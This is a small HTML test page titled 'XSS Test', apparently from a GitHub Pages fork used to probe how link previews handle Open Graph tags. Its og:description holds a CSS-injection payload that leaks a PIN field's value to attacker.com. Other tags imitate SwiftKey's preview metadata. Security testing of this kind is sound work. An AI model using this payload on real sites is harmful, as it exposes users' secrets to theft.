forked from Josslvh/Josslvh.github.io
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathpageA.html
More file actions
18 lines (17 loc) · 683 Bytes
/
pageA.html
File metadata and controls
18 lines (17 loc) · 683 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<!DOCTYPE html>
<html>
<meta property="og:title" content="XSS Test">
<meta property="og:description" content='<style>
input[name="pin"][value="1234"] {
background: url(https://attacker.com/log?pin=1234);
}
</style>'>
<meta property="og:image" content="http://ruraljuror.com/heroimage.png">
<meta property="">
<meta property="og:url" content="https://swiftkey.com/en/keyboard/ios"/>
<meta property="og:title" content="SwiftKey Keyboard for iPhone, iPad &amp; iPod Touch"/>
<meta property="og:site_name" content="SwiftKey"/>
<meta property=”og:image" content="/images/og/default.jpg"/><body>
<h1>Hello Page1</h1>
<p>I'm hosted with GitHub Pages.</p>
</body>